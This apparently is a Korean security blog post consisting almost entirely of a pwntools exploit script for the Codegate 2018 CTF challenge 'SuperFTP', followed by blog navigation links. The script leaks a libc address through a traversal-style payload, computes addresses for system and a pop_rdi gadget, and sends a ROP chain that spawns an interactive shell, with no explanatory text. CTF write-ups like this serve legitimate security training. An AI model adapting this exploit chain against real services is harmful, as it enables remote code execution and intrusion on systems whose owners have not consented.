Codegate 2018 SuperFTP

Pwnable/CTF 2018. 2. 5. 18:51

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
import os
 
p=process('./ftp')
#p=remote('ch41l3ng3s.codegate.kr',2121)
elf=ELF('./ftp')
 
 
def join(name,age,id_,pw):
    p.sendafter('Choice:','\x01')
    p.sendlineafter(':',name)
    p.sendlineafter(':',str(age))
    p.sendlineafter(':',id_)
    p.sendlineafter(':',pw)
 
def printf():
    p.sendafter('Choice:','\x02')
 
def login(id_,pw):
    p.sendafter('Choice:','\x03')
    p.sendlineafter(':',id_)
    p.sendlineafter(':',pw)
 
def with_():
    p.sendafter('Choice:','\x04')
 
def download_files():
    p.sendafter('Choice:','\x05')
 
def set_9020():
    p.sendafter('Choice:','\x07')
 
def Menu():
    p.sendafter('Choice:','\x08')    
 
join('AAAA',10,'AAAA','AAAA')
login('AAAA','AAAA')
set_9020()
Menu()
p.send('\x01\x00\x00\x00')
payload = '/../../../'+'B'*24
print p.recvuntil('URL:\n')
p.sendline(payload)
IO_file_underflow = u32(p.recv(4)[::-1]) - 303
libc_base = IO_file_underflow - 0x6b500
system = libc_base + 0x3b060
cmd = libc_base + 0x15fa0f
pop_rdi = libc_base + 0x7894f
print hex(libc_base)
print hex(system)
print hex(cmd)
print hex(pop_rdi)
set_9020()
Menu()
p.send('\x00')
Menu()
p.sendline('\x01\x00\x00\x00')
payload = 'B'*10+'/../../../../../../'+'A'*48+p32(cmd)[::-1]+p32(pop_rdi)[::-1]+p32(system)[::-1]*3
p.sendline(payload)
 
 
p.interactive()
Colored by Color Scripter
cs

저작자표시

'Pwnable > CTF' 카테고리의 다른 글

Codegate 2018 melong (2)	2018.02.07
코드게이트 2018 풀이 보고서 (0)	2018.02.07
HITCON CTF 2017 ragnarok (0)	2018.02.01
HITCON CTF 2017 babyfs (0)	2018.01.30
defcon 2016 pillpusher (1)	2018.01.24

ABOUT ME

HSr00t HSr00t

'Pwnable > CTF' 카테고리의 다른 글

티스토리툴바

ABOUT ME

'Pwnable > CTF' 카테고리의 다른 글

관련글 관련글 더보기

티스토리툴바